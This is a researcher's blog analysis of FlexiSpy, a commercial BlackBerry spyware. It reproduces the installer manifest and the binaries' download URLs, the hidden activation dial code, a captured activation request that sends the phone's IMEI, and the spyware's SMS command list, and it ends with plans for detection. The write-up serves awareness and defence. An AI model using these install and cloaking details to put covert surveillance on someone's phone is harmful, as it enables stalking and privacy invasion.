In keeping with the spirit of raising awareness, I’m pleased to present an in-depth look at the commercial spyware application known as FlexiSpy.  Looking at its creation date, the FlexiSpy domain started its online life in July of 2008 April of 2006, more than a three years ago [thanks Spyphoneguy for pointing that out].  The site sells several products meant for mobile phones, most of them can be classified as surveillance tools.  Their product suite, once purchased, will need to be installed on a “target’s” phone.  This target is a person on whom surveillance is conducted.  Functionality includes remotely reading emails, SMS messages, call logs and of course remote listening.  Depending on the product, this will set a buyer back about $200 – $300.

Once a buyer parts with his $300, he will receive a user manual that provides information on how the application can be installed on a target’s phone.  I examined the version for the BlackBerry.  When going through the user manual, one of the first things that jumped out at me was this: explicit instructions to set the Default Permissions of the BlackBerry handheld to Allow All. This means that not just FlexiSpy, but every single application the target installs on his phone after this can gain full control (within the scope of the programming interface or API) over his handheld.  Obviously user protection is not a high priority in this case.

At this point, I haven’t installed the app yet.  I begin to do so.  By using the phone’s built-in browser, I am asked to visit the site http://djp.cc.  I need to enter my activation key here and then I am presented with a download dialog.  This download dialog is simply a JAD file.  The contents of which are listed below:

Manifest-Version: 1.0
MIDlet-Version: 3.02.04
MIDlet-Jar-Size: 232073
RIM-COD-URL-2: net_rim_app_console_pro-2.cod
MicroEdition-Configuration: CLDC-1.1
MIDlet-Jar-URL: net_rim_app_console_pro.jar
RIM-COD-Module-Dependencies: net_rim_cldc,net_rim_bbapi_mailv2,net_rim_os,net_rim_bbapi_phone,
net_rim_locationapi
RIM-COD-SHA1-2: 49 d9 a2 9c 2e 55 c2 fc da b4 2d 96 01 67 ef 7a 89 26 25 ac
RIM-COD-URL-1: net_rim_app_console_pro-1.cod
RIM-COD-SHA1-1: ab 26 1a 63 7c e9 e4 83 bc 04 2b 69 22 c7 54 5b 73 02 13 ce
RIM-COD-Size-2: 31304
RIM-COD-Size-1: 87268
RIM-COD-Module-Name: net_rim_app_console_pro
MIDlet-Name: net_rim_app_console_pro
RIM-COD-Size: 78756
RIM-COD-Creation-Time: 1246442605
RIM-COD-URL: net_rim_app_console_pro.cod
RIM-Library-Flags: 3
RIM-COD-SHA1: c9 33 b8 05 92 d8 08 e0 03 a6 21 e3 56 e7 70 0a f8 42 63 b5
MicroEdition-Profile: MIDP-2.0
MIDlet-Vendor: <unknown>

This tells a BlackBerry where to go to get the actual binary or COD file.  In this case its http://djp.cc/net_rim_app_console_pro.cod and http://djp.cc/net_rim_app_console_pro-1.cod.  Generally, if a COD file exceeds size limitations or consists of several pre-compile external libraries, there will be a need to download more than 1 file.  This is interesting because the first thing I did after installing it is look for it in my Applications screen.  It turns out that FlexiSpy is never hidden on your BlackBerry.  It remains in plain sight, but with an obscure name that looks very similar to a RIM native library.  The application is also tagged as a library.

How FlexiSpy looks when installed

FlexiSpy is installed as a library

So there it is, if you want to look for the latest version of FlexiSpy on your BlackBerries, go to Options->Advanced Options->Applications and look for “net_rim_app_console_pro“.  One thing very interesting is that if something is marked as a Library, in theory at least, you should be able to access some of the classes and methods within.  Curious, I did a “strings” on each of the COD files.  True enough, there was a list of package names, classes and methods visible – at least their names.  Since I’ve given out the URL, I’ll leave this exercise up to the reader.  I will explore possibilities of how this can be done and if indeed other applications can make use of FlexiSpy’s libraries.

Behavior

FlexiSpy requires activation before it can begin to spy on a target.  To do this, a user has to dial the number *#900900900 and then a hidden screen is activated.  On this screen, a user is prompted to enter the activation code.  Never one to leave home without my Wireshark, I sniffed the traffic that went through during the activation process.  Here is the information that went across the wire:

POST /t4l-mcli/cmd/productactivate?mode=0&ver=0302&pid=FSP_BB_V4.2&actcode=[Activation Code]
&hash=[IMEI]&phmodel=8300(4.5.0.44) HTTP/1.1

This request is made to a server with second level domain “aabackup.info” It resolves to the same IP Address as the host djp.cc listed above.  As you can see, the phone’s IMEI is being sent back to FlexiSpy HQ.  Also visible is the Activation Code.  What is returned is a hash value which I didn’t look into very closely yet.  Presumably the phone calculates a similar algorithm and waits for a matching hash.  Once the correct hash is received the app is activated.

From this point out, its a case of configuring the application to intercept SMS messages, email messages, call logs, etc.  The application has a command channel through SMS.  Thus, you have a list of about 8 commands which do the following:

• Start Capture – Begin capturing events like email, sms, location, etc
• Stop Capture – Stop an already started capture
• Send Immediate – Send all collected events to the central logging host
• Send Diagnostics – Send diagnostic info
• Start SIM Monitor – Watch for any attempt at changing the SIM
• Stop SIM Monitor – Stop
• Start Mic Monitor – Wait for calls from a trigger number
• Stop Mic Monitor – Stop

The funny thing is that the command channel SMS messages cannot be deleted, so the manual advises a user to select short phrases like “Good morning” or some such to begin capturing information.  The phrases should be chosen so as not to arouse the target’s suspicion.

Detection

FlexiSpy relies very heavily on Listeners.  Even to bring up its secret screen, it adds a PhoneListener to wait for a specific number to be dialed.  This ensures that no running applications exist on the phone.  It uses these built-in features of the BlackBerry to remain cloaked.  It sits in plain sight in your applications directory and FlexiSpy can choose to constantly change its name whenever they release a new version.  I am incorporating the detection of both FlexiSpy and Mobile-Spy in my Kisses app.  I have a few ideas on how I can write a one time detector for FlexiSpy and Mobile-Spy.  The theories are on the drawing board at the moment.  I have to find a way to bring it into the code.

I expect to do a much more detailed write up on both FlexiSpy and Mobile-Spy and a much needed paper on what BlackBerry users can do to protect themselves.

Acknowledgments

Special thanks go out to Spyphoneguy for all his help!